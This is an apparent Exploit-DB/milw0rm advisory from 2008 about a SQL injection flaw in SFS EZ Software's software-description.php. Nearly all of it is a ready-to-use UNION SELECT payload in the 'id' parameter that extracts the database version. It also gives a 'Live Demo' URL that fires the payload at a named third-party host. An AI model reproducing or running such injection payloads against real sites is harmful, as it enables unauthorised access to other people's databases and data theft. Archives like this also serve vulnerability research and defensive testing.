SFS EZ Software - 'id' SQL Injection

EDB-ID:

6915


Author:

x0r

Type:

webapps


Platform:

PHP

Date:

2008-10-31


-=====================================-
Application : SFS EZ  Software
Risk : High
FOund By: x0r
-=====================================-

Exploit: software/software-description.php?id=-5 union all select
1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

Live Demo:
http://www.turnkeyzone.com/demos/software/software-description.php?id=-5%20union%20all%20select%201,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

-=EOF=-

# milw0rm.com [2008-10-31]